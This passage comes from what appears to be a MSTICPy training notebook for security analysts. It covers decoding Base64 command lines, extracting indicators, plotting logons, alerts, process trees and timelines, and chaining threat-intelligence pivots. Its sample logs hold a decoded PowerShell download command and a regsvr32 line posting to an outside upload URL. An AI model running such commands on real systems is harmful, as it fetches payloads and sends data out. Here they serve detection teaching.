    cmdl_data.merge(right=b64df, how="left", left_index=True, right_on="SourceIndex")
    # .drop(columns=['Unnamed: 0'])
    .set_index("SourceIndex")
)

# Show the result of the merge (only those rows that have a value in original_string)
merged_filtered = merged_df.dropna(subset=["decoded_string"])[
    [
        "TimeGenerated",
        "Account",
        "Computer",
        "NewProcessName",
        "CommandLine_x",
        "decoded_string",
    ]
]
merged_filtered

,TimeGenerated,Account,Computer,NewProcessName,CommandLine_x,decoded_string
SourceIndex,,,,,,
21,2/10/19 3:50 PM,WORKGROUP\MSTICAlertsWin1$,MSTICAlertsWin1,C:\Windows\System32\PING.EXE,cGluZyAgbWljcm9zb2Z0LmNvbSAtbiAxNSA=,ping microsoft.com -n 15
968,2/9/19 11:26 PM,MSTICAlertsWin1\MSTICAdmin,MSTICAlertsWin1,C:\W!ndows\System32\powershell.exe,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdld...,"-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:..."


Now that we have the decoded string, we can look for any Indicators of Compromise (IoCs) in these strings. Using [MSTICPy's `IoCExtract`](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html) we can search all of these decoded strings for things such as IP addresses, file hashes and URLs. You can choose to search of specific indicator types by passing the `ioc_types` parameter but we want to just search for everything.<br>

As with the Base64 decoding we can use a Pandas accessor `mp_ioc.extract` to call the IOC Extractor. We simply call it on the DataFrame and specify which columns to apply it to.

MSTICPy has a set of common IoC patterns to search for and extract but you can also extend this by adding your own regex patterns with `add_ioc_type`.

In [14]:
# Extract IoCs
ioc_df = merged_filtered.mp_ioc.extract(columns=["decoded_string"])
display(ioc_df)

,IoCType,Observable,SourceIndex,Input
0,dns,microsoft.com,21,ping microsoft.com -n 15
1,dns,wh401k.org,968,"-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:..."
2,url,http://wh401k.org/getps,968,"-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:..."


We can also use `domain_utils` to get some other information on the domain, such as what IP addresses it resolves to.

In [15]:
from msticpy.sectools.domain_utils import dns_resolve

dns_info = dns_resolve(ioc_df.iloc[0]["Observable"])
dns_info

{'qname': 'microsoft.com.',
 'rdtype': 'A',
 'rdclass': 'IN',
 'response': 'id 15079\nopcode QUERY\nrcode NOERROR\nflags QR RD RA\n;QUESTION\nmicrosoft.com. IN A\n;ANSWER\nmicrosoft.com. 120 IN A 20.84.181.62\nmicrosoft.com. 120 IN A 20.81.111.85\nmicrosoft.com. 120 IN A 20.103.85.33\nmicrosoft.com. 120 IN A 104.215.148.63\nmicrosoft.com. 120 IN A 20.112.52.29\n;AUTHORITY\n;ADDITIONAL',
 'nameserver': '192.168.1.1',
 'port': 53,
 'canonical_name': 'microsoft.com.',
 'rrset': ['20.84.181.62',
  '20.81.111.85',
  '20.103.85.33',
  '104.215.148.63',
  '20.112.52.29'],
 'expiration': datetime.datetime(2022, 4, 19, 23, 1, 50, 390355)}

<div class="alert alert-block alert-success">
    <h3>Lab Exercise 4</h3>
Syslog data is a common data source during security analysis. The syslog data structure includes a lot of key information in a single field that can make extraction complicated. <br>
In this exercise you will load syslog data and extract indicators from the Message field.<br>

**Bonus Task**:<br>
Identify the Base64 encoded syslog messages and extract indicators from those as well.

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Syslog data is found under the LinuxSyslog type of queries</li>
        <li>Core syslog data is stored in the SyslogMessage column</li>
    </ul>
</details>
</div>

In [16]:
# Load syslog data
sysdf = qry_prov.LinuxSyslog.list_all_syslog_events()
sysdf.head()

,TenantId,SourceSystem,TimeGenerated,Computer,EventTime [UTC],Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId,Source,AccountName
0,8ecf8077-cf51-4820-aadd-14040956f35d,Linux,"5/4/2021, 7:48:01.990 AM",SOC-FW-CEF,"5/4/2021, 7:48:01.000 AM",authpriv,SOC-FW-CEF,info,pam_unix(cron:session): session opened for user root by (uid=0),11466.0,10.0.1.7,CRON,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros...,user,user
1,8ecf8077-cf51-4820-aadd-14040956f35d,Linux,"5/4/2021, 7:48:01.993 AM",SOC-FW-CEF,"5/4/2021, 7:48:01.000 AM",authpriv,SOC-FW-CEF,info,pam_unix(cron:session): session closed for user root,11466.0,10.0.1.7,CRON,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros...,user,user
2,8ecf8077-cf51-4820-aadd-14040956f35d,Linux,"5/4/2021, 7:49:01.990 AM",SOC-FW-RSYSLOG,"5/4/2021, 7:49:01.000 AM",authpriv,SOC-FW-RSYSLOG,info,pam_unix(cron:session): session opened for user root by (uid=0),111364.0,10.0.1.5,CRON,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros...,user,user
3,8ecf8077-cf51-4820-aadd-14040956f35d,Linux,"5/4/2021, 7:49:01.990 AM",SOC-FW-RSYSLOG,"5/4/2021, 7:49:01.000 AM",syslog,SOC-FW-RSYSLOG,info,action 'action 2' resumed (module 'builtin:omfile') [v8.32.0 try http://www.rsyslog.com/e/2359 ],NaN,10.0.1.5,rsyslogd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros...,user,user
4,8ecf8077-cf51-4820-aadd-14040956f35d,Linux,"5/4/2021, 7:49:01.990 AM",SOC-FW-RSYSLOG,"5/4/2021, 7:49:01.000 AM",syslog,SOC-FW-RSYSLOG,warn,"action 'action 2' suspended (module 'builtin:omfile'), retry 0. There should be messages before ...",NaN,10.0.1.5,rsyslogd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros...,user,user


In [17]:
# Extract URL indicators from the SyslogMessage column and get a unique list of indicators found
ioc_df = sysdf.mp_ioc.extract(columns=["SyslogMessage"], ioc_types=["url"])
ioc_df["Observable"].unique()

array(['http://www.rsyslog.com/e/2359', 'www.rsyslog.com',
       'http://www.rsyslog.com/e/2007', 'http://www.rsyslog.com/e/2106',
       'http://www.microsoft.com', 'www.microsoft.com'], dtype=object)

In [18]:
# Decode Base64 data and extract indicators
sys_b64_df = sysdf.mp_b64.extract(column="SyslogMessage")
# get a list of decoded strings
sys_b64_df["decoded_string"].unique()
# Extract dns indicators from these strings (use the full_decoded_string column)
ioc_df = sys_b64_df.mp_ioc.extract(columns=["full_decoded_string"], ioc_types=["dns"])
ioc_df

,IoCType,Observable,SourceIndex,Input
0,dns,www.github.com,9,<decoded type='string' name='[None]' index='1' depth='1'>The secret URI is www.github.com/micros...


## Data Visualization
Data visaulization is a key tool in any data analyis scenario and the same is true during security analysis. MSTICPy contains a number of visualizations, below we will plot locations on a map to help identify anomolous logon locations, showing a graph of security alerts, and plotting a process tree showing process executions on a host.<br>

*MSTICpy uses [Bokeh](https://bokeh.org/) and [Folium](https://python-visualization.github.io/folium/#) to power its visualization features.*

The first thing we need to do is get some data to plot. Here we will use Azure AD signin events. These events include the location the login occured from allowing us to easily plot them on a map for geospacial analysis.

In [19]:
# Plot IP geolocation on a map
loc_data = qry_prov.Azure.list_all_signins_geo()
loc_data.head()

,TenantId,SourceSystem,TimeGenerated,ResourceId,OperationName,OperationVersion,Category,ResultType,ResultSignature,ResultDescription,DurationMs,CorrelationId,Resource,ResourceGroup,ResourceProvider,Identity,Level,Location,AlternateSignInName,AppDisplayName,AppId,AuthenticationDetails,AuthenticationMethodsUsed,AuthenticationProcessingDetails,AuthenticationRequirement,...,NetworkLocationDetails,OriginalRequestId,ProcessingTimeInMilliseconds,RiskDetail,RiskEventTypes,RiskEventTypes_V2,RiskLevelAggregated,RiskLevelDuringSignIn,RiskState,ResourceDisplayName,ResourceIdentity,ServicePrincipalId,ServicePrincipalName,Status,TokenIssuerName,TokenIssuerType,UserAgent,UserDisplayName,UserId,UserPrincipalName,AADTenantId,Type,Result,Latitude,Longitude
0,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380,Microsoft.aadiam,Microsoft.aadiam,NaN,CTFUser3,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],singleFactorAuthentication,...,[],f05079ed-f820-4531-ab26-498b53af3800,366,none,[],[],none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",CTFUser3,acc49186-e946-4f6c-85af-669807da0e0f,ctfuser3@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,42.997181,-86.848312
1,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:44.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,d5ef0f81-318f-4881-8df1-8415aab77d1a,Microsoft.aadiam,Microsoft.aadiam,NaN,Zack Von,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],NaN,...,[],121dca00-0930-40fe-9b69-bbc1e33c3500,394,none,[],NaN,none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",Zack Von,2566a1a6-4d03-40d2-8836-6c8cf1ce517f,zvon@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,48.614380,-121.110313
2,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:44.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,d5ef0f81-318f-4881-8df1-8415aab77d1a,Microsoft.aadiam,Microsoft.aadiam,NaN,Zack Von,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],singleFactorAuthentication,...,[],121dca00-0930-40fe-9b69-bbc1e33c3500,394,none,[],[],none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",Zack Von,2566a1a6-4d03-40d2-8836-6c8cf1ce517f,zvon@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,48.614380,-121.110313
3,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380,Microsoft.aadiam,Microsoft.aadiam,NaN,CTFUser3,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],NaN,...,[],f05079ed-f820-4531-ab26-498b53af3800,366,none,[],NaN,none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",CTFUser3,acc49186-e946-4f6c-85af-669807da0e0f,ctfuser3@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,42.997181,-86.848312
4,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:35.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN

Before we can plot the data we need to format the raw data into a known format. MSTICPy has a number of [defined entities](https://msticpy.readthedocs.io/en/latest/msticpy.datamodel.html?highlight=entitie), one of which is `Ip`. The entity has a location property, so by mapping the columns in our data to the properties of these entities we can easily format the whole dataset in a series of entities.

From there we can then using MSTICPy's [`FoliumMap`](https://msticpy.readthedocs.io/en/latest/visualization/FoliumMap.html) feature to plot these entities on a map.

In [20]:
ip_ents = []


def format_ips(row):
    ip_ent = entities.ip_address.Ip(Address=row["IPAddress"])
    loc = entities.GeoLocation(
        Longitude=float(row["Longitude"]), Latitude=float(row["Latitude"])
    )
    ip_ent.Location = loc
    ip_ents.append(ip_ent)


# Format dataset into entities
loc_data.apply(format_ips, axis=1)
# Create Map plot
folium_map = FoliumMap(zoom_start=2)
# Add IP entities to the map
folium_map.add_ip_cluster(ip_entities=ip_ents, color="blue")
# Center the map around the plotted entities
folium_map.center_map()
# Display the map
folium_map

Another useful visualization is a graph plot that shows connections between events. This is particularily useful when looking at data item such as alerts that contain a lot of embedded data such as affected hosts and users. By graph plotting alert data we can see the connections between them that might help a security analyst get a better understanding of an intrusion.

Using [`EntityGraph`](https://msticpy.readthedocs.io/en/latest/visualization/EntityGraph.html?highlight=entity%20graph) we can create a [NetworkX](https://networkx.org/) representation of our alerts and their entities. We then call [`.plot`] to display the graph using [Bokeh](https://bokeh.org/).

In [21]:
from msticpy.vis.entity_graph_tools import EntityGraph

# Entity Graph
alert_df = qry_prov.SecurityAlert.list_alerts()
grph = EntityGraph(alert_df)
grph.plot()

Loading BokehJS ...

Loading BokehJS ...

Figure(id='1004', ...)

Another common visualization in security tooling is the process tree. This show the hierarchical relationship of processes executed on a host.

MSTICPy bas functions to both build and plot these process trees based off Windows process creation events. More details on these functions can be found [here](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html).

In [24]:
# Before plotting a process tree we need to get data related to process creation events
proc_df = qry_prov.WindowsSecurity.get_process_tree()
proc_df.head()

,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc,NodeRole,Level,ProcessId1,NewProcessId1
0,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-14 11:51:38.507,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0x78225e,0x1150,C:\W!ndows\System32\regsvr32.exe,%%1936,0x12f4,".\regsvr32 /u /s c:\windows\fonts\csrss.exe ""http://www.401k.com/upload?pass=34592389"" post",C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-14 11:51:38.507,source,0,,
1,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-14 11:51:37.697,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0x78225e,0x6dc,C:\Windows\System32\conhost.exe,%%1936,0x12f4,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-14 11:51:37.697,sibling,1,,
2,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-14 11:51:38.117,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0x78225e,0x114c,C:\Windows\System32\cmd.exe,%%1936,0x12f4,cmd /c echo Begin Security Demo tasks,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-14 11:51:38.117,sibling,1,,
3,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-14 11:51:38.137,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0x78225e,0xfa4,C:\Windows\System32\cmd.exe,%%1936,0x12f4,cmd /c echo Any questions about the commands executed here then please contact one of,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-14 11:51:38.137,sibling,1,,
4,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-14 11:51:38.153,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0x78225e,0x1164,C:\Windows\System32\cmd.exe,%%1936,0x12f4,cmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-14 11:51:38.153,sibling,1,,


The process tree visualization can be called on a DataFrame using a Pandas accessor `mp_plot.process_tree()`

In [26]:
proc_df.mp_plot.process_tree()

Loading BokehJS ...

(Figure(id='1238', ...), Row(id='1346', ...))

Temporal analaysis is another key tool in security investigation. Seeing in which order events occur, and how events cluster temporally can provide some invaluable insights. To help with this MSTICPy contains a flexible [timeline feature](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) that allows for the plotting of a range of data on a timeline. You can plot simple single catagory descrite events, running values, and multi series events all in an interactive [Bokeh](https://bokeh.org/) visualization.

Using the timeline is a simple as calling `mp_plot.timeline()` on a DataFrame. By default this will use the TimeGenerated column for the time element, and a set of common column values to display when hovering over an event. These can be customized with the `time_column` and `source_columns` parameters (as used below).


In [30]:
# Get some data to plot
alert_df = qry_prov.SecurityAlert.list_alerts()
# Plot these values on a timeline based on when they were generated
alert_df.mp_plot.timeline(source_columns=["AlertName"])

Loading BokehJS ...

Column(id='2124', ...)

Its also possible to group events by a column to show them as seperate rows in the timeline. This is done by passing the column you want to split on as `group_by` - below we are grouping by the alert severity.

There are also many other ways to customize this timeline. Please read the [full documentation](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html#msticpy.nbtools.timeline.display_timeline) to see a list of options.

In [31]:
alert_df.mp_plot.timeline(source_columns=["AlertName"], group_by="Severity")

Loading BokehJS ...

Column(id='2466', ...)

<div class="alert alert-block alert-success">
    <h3>Lab Exercise 5</h3>
    In this lab you are going to plot your own timeline of events.<br>
    The timeline show plot Windows Host Logon events (.WindowsSecurity.list_host_logons).<br>
    You should group these by the logon type, and the hover over should show the user account logging in and what IP address they logged in from.
    
<details>
    <summary>Hint:</summary>
    <ul>
        <li>Grouping is passed with the 'group_by` parameter.</li>
        <li>Hover over values are set with the 'source_columns' parameter.</li>
    </ul>
</details>
</div>

In [32]:
# Load data
tl_df = qry_prov.WindowsSecurity.list_host_logons()

# Create timeline lab
tl_df.mp_plot.timeline(
    source_columns=["SubjectUserName", "IpAddress"], group_by="LogonType"
)

Loading BokehJS ...

Column(id='2872', ...)

## Pivots in MSTICPy

MSTICPy has a lot of functionality distributed across many classes and modules. However, there is no simple way to discover where these functions are and what types of data the function is relevant to.

[Pivot functions](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html) bring this functionality together grouped around Entities. Entities are representations of real-world objects found commonly in CyberSec investigations. Some examples are: IpAddress, Host, Account, URL.

In the following cells we look at how pivot functions can be used to easily access MSTICPy functionality relevent to the indicator being investigated.

<div class="alert alert-block alert-warning">
<b>Note:</b> When you initialize the Pivot provider you will get a configuration error warning. This is not a problem (we are not using this feature in this lab), we have included it to give you an example of the customized warnings in MSTICPy. These are designed to help users when running MSTICPy in notebooks, you can see that the error provides instructions and guidance to resolve issues (you don't have to resolve this one though!).
</div>

We first start by initalizing our Pivots:

In [33]:
from msticpy.datamodel.pivot import Pivot
Pivot(namespace=globals())

Once loaded we can take a look at the avaliable Pivots.

<div class="alert alert-block alert-info">
<b>Note:</b> The avaliable Pivots are based on the providers we have loaded so if you have additional providers loaded you will have more Pivots avaliable to you..</div>



In [34]:
# Once loaded we can browse what pivots are avaliable in an interactive widget
Pivot.browse()

To begin to Pivot we first need to get an entity to Pivot on. For this lab we are going to use an IP address entity, and once extracted our first Pivot will be to see if what sort of IP address it is using the `ip_type` Pivot.

In this example we are running the Pivot on a single indicator, however many Pivots also let you apply them to an entire dataframe (you will see this in the next Pivot example).

In [35]:
# Get an IP Address to pivot on
ip_df = qry_prov.Network.list_azure_network_flows_by_ip()
ip = ip_df.iloc[0]["VMIPAddress"]
# See what type of IP address what we are working with.
entities.IpAddress.util.ip_type(ip_str=ip)

,ip,result,src_row_index
0,10.0.3.5,Private,0


As well as individual Pivots you can chain them together to perform several actions on a dataset.<br>
More information on [Pivots can be found in the MSTICPy documentation](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html)

In the cell below we are taking a dataframe containing command line data addresses and applying a chain of Pivots to them.<br>
The chain in use does the following:<br>
<ul>
    <li>Extracts IoCs from the command lines in the data</li>
    <li>Filters to only logs that contained IoCs</li>
    <li>Further filters to where the IoCs were IP addresses</li>
    <li>Looks up those IP address in threat intelligence</li>
    <li>Filters to only those events where there was a match in threat intelligence</li>
</ul>

In [48]:
# Get some command line data
cmdl_data = qry_prov.LinuxSyslog.list_all_syslog_events()
# Extract IoCs from command lines
(
    cmdl_data.head(500).mp_pivot.run(
        entities.Process.util.extract_iocs, column="SyslogMessage", join="left"
    )
    # Filter where there were IoCs found
    .dropna(subset=["Observable"])
    # Filter to only IP IoCs
    .query("IoCType == 'ipv4'")
    # Lookup IoCs in threat intel
    .mp_pivot.run(
        entities.IpAddress.ti.lookup_ipv4_GreyNoise, column="Observable", join="left"
    )
    # Filter to where the IPs were found in threat intel
    .query("Status != 404")
)

,TenantId,SourceSystem,TimeGenerated,Computer,EventTime [UTC],Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId,Source,AccountName,IoCType,Observable,SourceIndex,Input,Ioc,IocType,SafeIoc,QuerySubtype,Provider,Result,Severity,Details,RawResult,Reference,Status
1,8ecf8077-cf51-4820-aadd-14040956f35d,Linux,"5/4/2021, 8:16:01.040 AM",SOC-FW-CEF,"5/4/2021, 8:16:01.000 AM",authpriv,SOC-FW-CEF,info,pam_unix(cron:session): session closed for user root from 113.116.23.69,14458.0,10.0.1.7,CRON,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros...,user,user,ipv4,113.116.23.69,298.0,pam_unix(cron:session): session closed for user root from 113.116.23.69,113.116.23.69,ipv4,113.116.23.69,None,GreyNoise,True,information,"{'Classification': 'unknown', 'Name': 'unknown', 'Last Seen': '2022-04-19', 'Message': 'Success'...","{'ip': '113.116.23.69', 'noise': True, 'riot': False, 'classification': 'unknown', 'name': 'unkn...",https://api.greynoise.io/v3/community/113.116.23.69,0


<div class="alert alert-block alert-success">

<h3>Lab Exercise 6</h3>
Create your own pivot pipeline that does the following:<br>
<ul>
    <li>Takes the dataframe created for you (net_df)</li>
    <li>Gets the type of IP address and joins this to the data</li>
    <li>Selects only the Public IP addresses in the dataset</li>
    <li>Filters to only 100 events</li>
    <li>Looks up the IP addresses in threat intelligence feeds using GreyNoise</li>
    <li>Selects only the IP addresses where there is a match in threat intelligence</li>
</ul>

<details>
    <summary>Hint:</summary>
    <ul>
        <li>.head(100) will filter a Pandas dataframe to 100 rows</li>
        <li>when calling pivot.run the parameter join='left' can be used to join the resulting dataframe into the original dataframe</li>
        <li>Posting threat intel results from GreyNoise can be distinguished by the status not being 404</li>
    </ul>
</details>
</div>

In [65]:
net_df = qry_prov.Network.list_azure_network_flows_by_ip()
net_df["PublicIPs"] = (
    net_df["PublicIPs"]
    .str.strip("['']")
    .str.replace("'", "")
    .str.replace(" ", "")
    .str.split(",")
)
net_df = net_df.assign(IPs=net_df["PublicIPs"].explode("IPs"))
net_df.dropna(subset=["IPs"], inplace=True)
(
    net_df.mp_pivot.run(entities.IpAddress.util.ip_type, column="IPs", join="left")
    .query("result == 'Public'")
    .head(100)
    .mp_pivot.run(
        entities.IpAddress.ti.lookup_ipv4_GreyNoise, column="IPs", join="left"
    )
    .query("Status != 404")
)

,TenantId,TimeGenerated,FlowStartTime,FlowEndTime,FlowIntervalEndTime,FlowType,ResourceGroup,VMName,VMIPAddress,PublicIPs,SrcIP,DestIP,L4Protocol,L7Protocol,DestPort,FlowDirection,AllowedOutFlows,AllowedInFlows,DeniedInFlows,DeniedOutFlows,RemoteRegion,VMRegion,AllExtIPs,TotalAllowedFlows,IPs,ip,result,Ioc,IocType,SafeIoc,QuerySubtype,Provider,Result,Severity,Details,RawResult,Reference,Status
0,52b1ab41-869e-4138-9e40-2a4457f09bf0,23:59.5,21:58.0,21:58.0,00:00.0,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,[103.199.215.204],NaN,NaN,T,https,443,O,1,0,0,0,centralus,eastus,103.199.215.204,1,103.199.215.204,103.199.215.204,Public,103.199.215.204,ipv4,103.199.215.204,None,GreyNoise,True,high,"{'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2022-04-19', 'Message': 'Succes...","{'ip': '103.199.215.204', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': '...",https://api.greynoise.io/v3/community/103.199.215.204,0
1,52b1ab41-869e-4138-9e40-2a4457f09bf0,23:59.5,21:58.0,21:58.0,00:00.0,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,[103.199.215.204],NaN,NaN,T,https,443,O,1,0,0,0,centralus,eastus,103.199.215.204,1,103.199.215.204,103.199.215.204,Public,103.199.215.204,ipv4,103.199.215.204,None,GreyNoise,True,high,"{'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2022-04-19', 'Message': 'Succes...","{'ip': '103.199.215.204', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': '...",https://api.greynoise.io/v3/community/103.199.215.204,0
2,52b1ab41-869e-4138-9e40-2a4457f09bf0,23:59.5,21:58.0,21:58.0,00:00.0,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,[103.199.215.204],NaN,NaN,T,https,443,O,1,0,0,0,centralus,eastus,103.199.215.204,1,103.199.215.204,103.199.215.204,Public,103.199.215.204,ipv4,103.199.215.204,None,GreyNoise,True,high,"{'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2022-04-19', 'Message': 'Succes...","{'ip': '103.199.215.204', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': '...",https://api.greynoise.io/v3/community/103.199.215.204,0
3,52b1ab41-869e-4138-9e40-2a4457f09bf0,23:59.5,21:58.0,21:58.0,00:00.0,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,[103.199.215.204],NaN,NaN,T,https,443,O,1,0,0,0,centralus,eastus,103.199.215.204,1,103.199.215.204,103.199.215.204,Public,103.199.215.204,ipv4,103.199.215.204,None,GreyNoise,True,high,"{'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2022-04-19', 'Message': 'Succes...","{'ip': '103.199.215.204', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': '...",https://api.greynoise.io/v3/community/103.199.215.204,0
4,52b1ab41-869e-4138-9e40-2a4457f09bf0,23:59.5,21:58.0,21:58.0,00:00.0,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,[103.199.215.204],NaN,NaN,T,https,443,O,1,0,0,0,centralus,eastus,103.199.215.204,1,103.199.215.204,103.199.215.204,Public,103.199.215.204,ipv4,103.199.215.204,None,GreyNoise,True,high,"{'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2022-04-19', 'Message': 'Succes...","{'ip': '103.199.215.204', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': '...",https://api.greynoise.io/v3/community/103.199.215.204,0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
2020,52b1ab41-869e-4138-9e40-2a4457f09bf0,23:59.5,21:58.0,21:58.0,00:00.0,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,[103.199.215.204],NaN,NaN,T,https,443,O,1,0,0,0,centralus,eastus,103.199.215.204,1,103.199.215.204,103.199.215.204,Public,103.199.215.204,ipv4,103.199.215.204,None,GreyNoise,True,high,"{'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2022-04-19', 'Message': 'Succes...","{'ip': '103.199.215.204', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': '...",https://api.greynoise.io/v3/community/103.199.215.204,0


## MSTICPy's ML Features

MSTICPy has a number of basic ML features to support simple analysis that is common in security investigaiton. In the following section we will look at two of those; timeseries analysis and clustering.

